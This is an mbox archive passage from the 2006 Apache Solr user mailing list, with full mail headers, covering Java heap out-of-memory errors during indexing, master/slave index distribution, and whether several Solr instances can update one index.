(adsl-68-125-128-220.dsl.pltn13.pacbell.net [161.129.204.104]) by pimout6-ext.prodigy.net (8.13.4 outbound domainkey aix/8.13.4) with ESMTP id k2N0XsM2048518 for <[email protected]>; Wed, 22 Mar 2006 19:34:01 -0500 Received: from [161.129.204.104] (unknown [161.129.204.104]) by us.forensiclogic.com (Postfix) with ESMTP id CFA02F27EE for <[email protected]>; Wed, 22 Mar 2006 16:33:53 -0800 (PST) Date: Wed, 22 Mar 2006 16:34:03 -0800 (PST) From: [email protected] X-X-Sender: [email protected] To: [email protected] Subject: SEVERE: java.lang.OutOfMemoryError: Java heap space Message-ID: <[email protected]> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Occasionally when inserting I get the error message SEVERE: java.lang.OutOfMemoryError: Java heap space Any clues how to track down when&where it's happening? Or any good way I can get better clues how to track it down? I'm doing inserts of about 1000 documents at a time between commits. Would doing a smaller number avoid this problem. Or, better - any way I can calculate how many docs I can insert in a batch without triggering this? From [email protected] Thu Mar 23 03:15:34 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 93546 invoked from network); 23 Mar 2006 03:15:33 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Mar 2006 03:15:33 -0000 Received: (qmail 23660 invoked by uid 500); 23 Mar 2006 03:15:33 -0000 Delivered-To: [email protected] Received: (qmail 23640 invoked by uid 500); 23 Mar 2006 03:15:33 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 23631 invoked by uid 99); 23 Mar 2006 03:15:32 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 22 Mar 2006 19:15:32 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO zproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 22 Mar 2006 19:15:32 -0800 Received: by zproxy.gmail.com with SMTP id i28so370492nzi for <[email protected]>; Wed, 22 Mar 2006 19:15:11 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=Qcn7iUhxp/L07sUay2t/0uAjDy4p9pQYC6mwjgeKBa74S7gJ+dZxbbqZQu8zVHBs/+gIhxWO4ErlX3hDy87A39jJaN4bX/z8vO77CSI7GiiSdKngAOmd8TILTpySwXnka40t4NvMa7zzKxeIPPidh74ODiS8s+fGvT4tyRYl1RI= Received: by 161.129.204.104 with SMTP id f9mr188767pyl; Wed, 22 Mar 2006 19:15:09 -0800 (PST) Received: by 161.129.204.104 with HTTP; Wed, 22 Mar 2006 19:15:09 -0800 (PST) Message-ID: <[email protected]> Date: Wed, 22 Mar 2006 22:15:09 -0500 From: "Yonik Seeley" <[email protected]> To: [email protected] Subject: Re: SEVERE: java.lang.OutOfMemoryError: Java heap space In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On 3/22/06, [email protected] <[email protected]> wrote: > > Occasionally when inserting I get the error message > SEVERE: java.lang.OutOfMemoryError: Java heap space > Any clues how to track down when&where it's happening? > Or any good way I can get better clues how to track it down? What's the heap size of the JVM. The default is normally pretty small. If you are using the example, just put it on the command line... java -Xmx256m -jar start.jar > I'm doing inserts of about 1000 documents at a time between > commits. Would doing a smaller number avoid this problem. No, that shouldn't be a problem. Solr only keeps a single hashtable entry for each unique id of uncommitted documents so it can delete duplicates during the commit. The exception probably hits when lucene needs to merge segments.=20 There isn't much you can do to avoid that memory usage except increase the heap size. BTW, How many indexed fields do you have? -Yonik From [email protected] Fri Mar 24 11:47:37 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 64927 invoked from network); 24 Mar 2006 11:47:37 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Mar 2006 11:47:37 -0000 Received: (qmail 34299 invoked by uid 500); 24 Mar 2006 11:47:36 -0000 Delivered-To: [email protected] Received: (qmail 34279 invoked by uid 500); 24 Mar 2006 11:47:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 34270 invoked by uid 99); 24 Mar 2006 11:47:36 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 24 Mar 2006 03:47:36 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=HTML_MESSAGE X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO godard.uk.mediasurface.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 24 Mar 2006 03:47:35 -0800 Received: from neptune.int.mediasurface.com (neptune.int.mediasurface.com [161.129.204.104]) by godard.uk.mediasurface.com (8.13.4+Sun/8.13.4) with ESMTP id k2OBl9EC003149 for <[email protected]>; Fri, 24 Mar 2006 11:47:09 GMT X-MimeOLE: Produced By Microsoft Exchange V6.5 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C64F38.AF0C3B0D" Subject: To cluster, or not to cluster... Date: Fri, 24 Mar 2006 11:47:09 -0000 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: To cluster, or not to cluster... Thread-Index: AcZPOK7fYfjhfRkZTlCUaZtVc4bCDw== From: "Robert Haycock" <[email protected]> To: <[email protected]> X-Scanned-By: MIMEDefang 2.54 on 161.129.204.104 X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ------_=_NextPart_001_01C64F38.AF0C3B0D Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Hi, =20 Is it/will it be possible to cluster solr? =20 We have a distributed system and it would be nice if we could replicate the index to improve performance. =20 Rob. =20 ------_=_NextPart_001_01C64F38.AF0C3B0D-- From [email protected] Fri Mar 24 16:55:08 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 45790 invoked from network); 24 Mar 2006 16:55:08 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Mar 2006 16:55:08 -0000 Received: (qmail 11071 invoked by uid 500); 24 Mar 2006 16:55:08 -0000 Delivered-To: [email protected] Received: (qmail 11042 invoked by uid 500); 24 Mar 2006 16:55:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 11033 invoked by uid 99); 24 Mar 2006 16:55:07 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 24 Mar 2006 08:55:07 -0800 X-ASF-Spam-Status: No, hits=1.3 required=10.0 tests=HTML_MESSAGE,RCVD_IN_BL_SPAMCOP_NET,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO wproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 24 Mar 2006 08:55:06 -0800 Received: by wproxy.gmail.com with SMTP id i24so866092wra for <[email protected]>; Fri, 24 Mar 2006 08:54:46 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=nMtXDOScqpYQsfWhAVGy/Ub/u51t4Ykh5L2sMrvyvB3K6hfuz99mo5hycF70jCNFqK2I/MkXI44IDlWsQ9o/NqkUVq5liVlTaos+kEMJegzhJvn/EPSkmw/2BMubistxOo1QNTHV5QUig1aUp2iy2E2AndPIMgJwN0fsvzwD2g0= Received: by 161.129.204.104 with SMTP id 16mr886224qbj; Fri, 24 Mar 2006 08:54:45 -0800 (PST) Received: by 161.129.204.104 with HTTP; Fri, 24 Mar 2006 08:54:45 -0800 (PST) Message-ID: <[email protected]> Date: Fri, 24 Mar 2006 11:54:45 -0500 From: "Clay Webster" <[email protected]> To: [email protected] Subject: Re: To cluster, or not to cluster... In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_12479_6970167.1143219285702" References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ------=_Part_12479_6970167.1143219285702 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline On 3/24/06, Robert Haycock <[email protected]> wrote: > > Is it/will it be possible to cluster solr? > > We have a distributed system and it would be nice if we could replicate > the index to improve performance. > > Solr does not have replication. But it does have a very nice index distribution system. Solr can be run in a master/slave setup. The master receives all the changes. For each commit a snapshooter index can be made. The slaves can run the snappuller with whatever polling frequency they like. Each snapsho= t is then snapinstalled in the slave and can have its cache warmed (while serving queries from the older index). Slaves can come on line with new indexes out of sync. But if your slave hardware is the same and your pulling and shooting well-understood, and you make warming time-based it probably will not be a problem. This distribution is noted by each slave in the master. That's as tied together as they get (not much). So, if you have a requirement that they must all b= e in index-version-sync you could tie them closer and extend Solr. --cw ------=_Part_12479_6970167.1143219285702-- From [email protected] Fri Mar 24 17:03:16 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 51681 invoked from network); 24 Mar 2006 17:03:16 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Mar 2006 17:03:16 -0000 Received: (qmail 26571 invoked by uid 500); 24 Mar 2006 17:03:16 -0000 Delivered-To: [email protected] Received: (qmail 26513 invoked by uid 500); 24 Mar 2006 17:03:16 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 26503 invoked by uid 99); 24 Mar 2006 17:03:16 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 24 Mar 2006 09:03:16 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO godard.uk.mediasurface.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 24 Mar 2006 09:03:15 -0800 Received: from neptune.int.mediasurface.com (neptune.int.mediasurface.com [161.129.204.104]) by godard.uk.mediasurface.com (8.13.4+Sun/8.13.4) with ESMTP id k2OH2oea012306 for <[email protected]>; Fri, 24 Mar 2006 17:02:50 GMT X-MimeOLE: Produced By Microsoft Exchange V6.5 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Subject: RE: To cluster, or not to cluster... Date: Fri, 24 Mar 2006 17:02:51 -0000 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: To cluster, or not to cluster... Thread-Index: AcZPY7e21WMHHL/3TcG6OKC4T+9CoAAAQHbg From: "Robert Haycock" <[email protected]> To: <[email protected]> X-Scanned-By: MIMEDefang 2.54 on 161.129.204.104 X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N That's great, cheers. Rob. -----Original Message----- From: Clay Webster [mailto:[email protected]]=20 Sent: 24 March 2006 16:55 To: [email protected] Subject: Re: To cluster, or not to cluster... On 3/24/06, Robert Haycock <[email protected]> wrote: > > Is it/will it be possible to cluster solr? > > We have a distributed system and it would be nice if we could replicate > the index to improve performance. > > Solr does not have replication. But it does have a very nice index distribution system. Solr can be run in a master/slave setup. The master receives all the changes. For each commit a snapshooter index can be made. The slaves can run the snappuller with whatever polling frequency they like. Each snapshot is then snapinstalled in the slave and can have its cache warmed (while serving queries from the older index). Slaves can come on line with new indexes out of sync. But if your slave hardware is the same and your pulling and shooting well-understood, and you make warming time-based it probably will not be a problem. This distribution is noted by each slave in the master. That's as tied together as they get (not much). So, if you have a requirement that they must all be in index-version-sync you could tie them closer and extend Solr. --cw From [email protected] Fri Mar 24 18:09:46 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88315 invoked from network); 24 Mar 2006 18:09:46 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Mar 2006 18:09:46 -0000 Received: (qmail 71920 invoked by uid 500); 24 Mar 2006 18:09:46 -0000 Delivered-To: [email protected] Received: (qmail 71905 invoked by uid 500); 24 Mar 2006 18:09:46 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 71892 invoked by uid 99); 24 Mar 2006 18:09:45 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 24 Mar 2006 10:09:45 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=HTML_MESSAGE X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO godard.uk.mediasurface.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 24 Mar 2006 10:09:45 -0800 Received: from neptune.int.mediasurface.com (neptune.int.mediasurface.com [161.129.204.104]) by godard.uk.mediasurface.com (8.13.4+Sun/8.13.4) with ESMTP id k2OI9Lha020697 for <[email protected]>; Fri, 24 Mar 2006 18:09:21 GMT X-MimeOLE: Produced By Microsoft Exchange V6.5 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C64F6E.13B2642E" Subject: Multiple updates possible? Date: Fri, 24 Mar 2006 18:09:22 -0000 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: Multiple updates possible? Thread-Index: AcZPbhPJgWvaCsiCSfesYUiFp8zB/A== From: "Robert Haycock" <[email protected]> To: <[email protected]> X-Scanned-By: MIMEDefang 2.54 on 161.129.204.104 X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ------_=_NextPart_001_01C64F6E.13B2642E Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Hello again, =20 We're looking at having multiple instances of Solr looking at a single lucene index. Would there be a problem if all instances updated the index at the same time? =20 Rob. ------_=_NextPart_001_01C64F6E.13B2642E-- From [email protected] Fri Mar 24 18:22:41 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 93293 invoked from network); 24 Mar 2006 18:22:41 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Mar 2006 18:22:41 -0000 Received: (qmail 91460 invoked by uid 500); 24 Mar 2006 18:22:41 -0000 Delivered-To: [email protected] Received: (qmail 91396 invoked by uid 500); 24 Mar 2006 18:22:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 91387 invoked by uid 99); 24 Mar 2006 18:22:40 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 24 Mar 2006 10:22:40 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO rescomp.berkeley.edu) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 24 Mar 2006 10:22:40 -0800 Received: by rescomp.berkeley.edu (Postfix, from userid 1007) id 9BC5A5B771; Fri, 24 Mar 2006 10:22:19 -0800 (PST) Received: from localhost (localhost [161.129.204.104]) by rescomp.berkeley.edu (Postfix) with ESMTP id 90A1F7F403 for <[email protected]>; Fri, 24 Mar 2006 10:22:19 -0800 (PST) Date: Fri, 24 Mar 2006 10:22:19 -0800 (PST) From: Chris Hostetter <[email protected]> To: [email protected] Subject: Re: Multiple updates possible? In-Reply-To: <[email protected]> Message-ID: <[email protected]> References: <[email protected]> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N : We're looking at having multiple instances of Solr looking at a single : lucene index. Would there be a problem if all instances updated the : index at the same time? I'm 99% sure it won't be possible to have multiple server instances using the same index directory and making modifications -- i think the UpdateHandler maintains an persistent IndexWriter between commits (so that it doesn't pay the cost of opening the IndexWRiter every time you add/update a document. However, you might be able to have multiple servers *reading* from the same index, which only one server udpates -- if you configure the postCommit hook appropriately on your "master" (the server doing updates) it can even execute a shell script to notify all of the other servers that it's cahnge the index and they should re-open their IndexReaders. Can I ask what your use case is for wanting multiple servers updating the same physical index directory? -Hoss From [email protected] Fri Mar 24 18:27:58 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 96913 invoked from network); 24 Mar 2006 18:27:58 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Mar 2006 18:27:58 -0000 Received: (qmail 1178 invoked by uid 500); 24 Mar 2006 18:27:58 -0000 Delivered-To: [email protected] Received: (qmail 1162 invoked by uid 500); 24 Mar 2006 18:27:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 1153 invoked by uid 99); 24 Mar 2006 18:27:58 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 24 Mar 2006 10:27:58 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO godard.uk.mediasurface.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 24 Mar 2006 10:27:57 -0800 Received: from neptune.int.mediasurface.com (neptune.int.mediasurface.com [161.129.204.104]) by godard.uk.mediasurface.com (8.13.4+Sun/8.13.4) with ESMTP id k2OIRX3V022707 for <[email protected]>; Fri, 24 Mar 2006 18:27:34 GMT X-MimeOLE: Produced By Microsoft Exchange V6.5 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Subject: RE: Multiple updates possible? Date: Fri, 24 Mar 2006 18:27:35 -0000 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: Multiple updates possible? Thread-Index: AcZPb/MJEaKffmJ5QkCcNbPy8FaLNAAAFw4w From: "Robert Haycock" <[email protected]> To: <[email protected]> X-Scanned-By: MIMEDefang 2.54 on 161.129.204.104 X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N In this case we are looking at having multiple tomcats to provide us with load balancing and failover. We are not looking at a master/slave index solution. We'll also be working on windows. Rob. -----Original Message----- From: Chris Hostetter [mailto:[email protected]]=20 Sent: 24 March 2006 18:22 To: [email protected] Subject: Re: Multiple updates possible? : We're looking at having multiple instances of Solr looking at a single : lucene index. Would there be a problem if all instances updated the : index at the same time? I'm 99% sure it won't be possible to have multiple server instances using the same index directory and making modifications -- i think the UpdateHandler maintains an persistent IndexWriter between commits (so that it doesn't pay the cost of opening the IndexWRiter every time you add/update a document. However, you might be able to have multiple servers *reading* from the same index, which only one server udpates -- if you configure the postCommit hook appropriately on your "master" (the server doing updates) it can even execute a shell script to notify all of the other servers that it's cahnge the index and they should re-open their IndexReaders. Can I ask what your use case is for wanting multiple servers updating the same physical index directory? -Hoss From [email protected] Fri Mar 24 18:32:46 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 99609 invoked from network); 24 Mar 2006 18:32:46 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Mar 2006 18:32:46 -0000 Received: (qmail 5674 invoked by uid 500); 24 Mar 2006 18:32:46 -0000 Delivered-To: [email protected] Received: (qmail 5615 invoked by uid 500); 24 Mar 2006 18:32:46 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 5605 invoked by uid 99); 24 Mar 2006 18:32:46 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 24 Mar 2006 10:32:46 -0800 X-ASF-Spam-Status: No, hits=2.3 required=10.0 tests=DNS_FROM_RFC_ABUSE,DNS_FROM_RFC_WHOIS,FORGED_YAHOO_RCVD,HTML_MESSAGE X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO web50008.mail.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Fri, 24 Mar 2006 10:32:45 -0800 Received: (qmail 35516 invoked by uid 60001); 24 Mar 2006 18:32:24 -0000 DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:Date:From:Reply-To:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=q5c2llK5JNphy7GEYtsSSE1grFmSVXhWCNqC3/8LdwgpquJRX41lcfY0Zntrg0okgz/vALdl1ln3sKd691stSg+d5LdltbjdHWOKljFo7HtIwxmgKhP1NjwaXnBZ3D2Z2eP90fx1CLooqf19PMcUxX8i//yLe2wFNzx/m/TveQM= ; Message-ID: <[email protected]> Date: Fri, 24 Mar 2006 10:32:24 -0800 (PST) From: jason rutherglen <[email protected]> Reply-To: jason rutherglen <[email protected]> Subject: Re: To cluster, or not to cluster... To: [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="0-2026966512-1143225144=:26625" X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N --0-2026966512-1143225144=:26625 Content-Type: text/plain; charset=us-ascii It should be possible to do clustering if you divide your master index over multiple master servers. Then write a wrapper around the SolrClient API using something like MultiSearcher. From what I know this would work, could be wrong. ----- Original Message ---- From: Clay Webster <[email protected]> To: [email protected] Sent: Friday, March 24, 2006 8:54:45 AM Subject: Re: To cluster, or not to cluster... On 3/24/06, Robert Haycock <[email protected]> wrote: > > Is it/will it be possible to cluster solr? > > We have a distributed system and it would be nice if we could replicate > the index to improve performance. > > Solr does not have replication. But it does have a very nice index distribution system. Solr can be run in a master/slave setup. The master receives all the changes. For each commit a snapshooter index can be made. The slaves can run the snappuller with whatever polling frequency they like. Each snapshot is then snapinstalled in the slave and can have its cache warmed (while serving queries from the older index). Slaves can come on line with new indexes out of sync. But if your slave hardware is the same and your pulling and shooting well-understood, and you make warming time-based it probably will not be a problem. This distribution is noted by each slave in the master. That's as tied together as they get (not much). So, if you have a requirement that they must all be in index-version-sync you could tie them closer and extend Solr. --cw --0-2026966512-1143225144=:26625-- From [email protected] Fri Mar 24 19:27:23 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 38158 invoked from network); 24 Mar 2006 19:27:22 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Mar 2006 19:27:22 -0000 Received: (qmail 20543 invoked by uid 500); 24 Mar 2006 19:27:22 -0000 Delivered-To: [email protected] Received: (qmail 20524 invoked by uid 500); 24 Mar 2006 19:27:22 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 20515 invoked by uid 99); 24 Mar 2006 19:27:22 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 24 Mar 2006 11:27:22 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO godard.uk.mediasurface.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 24 Mar 2006 11:27:21 -0800 Received: from neptune.int.mediasurface.com (neptune.int.mediasurface.com [161.129.204.104]) by godard.uk.mediasurface.com (8.13.4+Sun/8.13.4) with ESMTP id k2OJQuYA029248 for <[email protected]>; Fri, 24 Mar 2006 19:26:57 GMT X-MimeOLE: Produced By Microsoft Exchange V6.5 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Subject: RE: To cluster, or not to cluster... Date: Fri, 24 Mar 2006 19:26:58 -0000 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: To cluster, or not to cluster... Thread-Index: AcZPcVt+CJg+hE0tQZunXSxULcCYqwAB2C1Q From: "Robert Haycock" <[email protected]> To: <[email protected]> X-Scanned-By: MIMEDefang 2.54 on 161.129.204.104 X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hi Jason, Would that not mean if one of the master indexes went down then a subset of data would be offline? Rob. -----Original Message----- From: jason rutherglen [mailto:[email protected]]=20 Sent: 24 March 2006 18:32 To: [email protected] Subject: Re: To cluster, or not to cluster... It should be possible to do clustering if you divide your master index over multiple master servers. Then write a wrapper around the SolrClient API using something like MultiSearcher. From what I know this would work, could be wrong. ----- Original Message ---- From: Clay Webster <[email protected]> To: [email protected] Sent: Friday, March 24, 2006 8:54:45 AM Subject: Re: To cluster, or not to cluster... On 3/24/06, Robert Haycock <[email protected]> wrote: > > Is it/will it be possible to cluster solr? > > We have a distributed system and it would be nice if we could replicate > the index to improve performance. > > Solr does not have replication. But it does have a very nice index distribution system. Solr can be run in a master/slave setup. The master receives all the changes. For each commit a snapshooter index can be made. The slaves can run the snappuller with whatever polling frequency they like. Each snapshot is then snapinstalled in the slave and can have its cache warmed (while serving queries from the older index). Slaves can come on line with new indexes out of sync. But if your slave hardware is the same and your pulling and shooting well-understood, and you make warming time-based it probably will not be a problem. This distribution is noted by each slave in the master. That's as tied together as they get (not much). So, if you have a requirement that they must all be in index-version-sync you could tie them closer and extend Solr. --cw From [email protected] Fri Mar 24 19:39:46 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 48369 invoked from network); 24 Mar 2006 19:39:45 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Mar 2006 19:39:45 -0000 Received: (qmail 35615 invoked by uid 500); 24 Mar 2006 19:39:45 -0000 Delivered-To: [email protected] Received: (qmail 35600 invoked by uid 500); 24 Mar 2006 19:39:45 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 35591 invoked by uid 99); 24 Mar 2006 19:39:45 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 24 Mar 2006 11:39:45 -0800 X-ASF-Spam-Status: No, hits=2.3 required=10.0 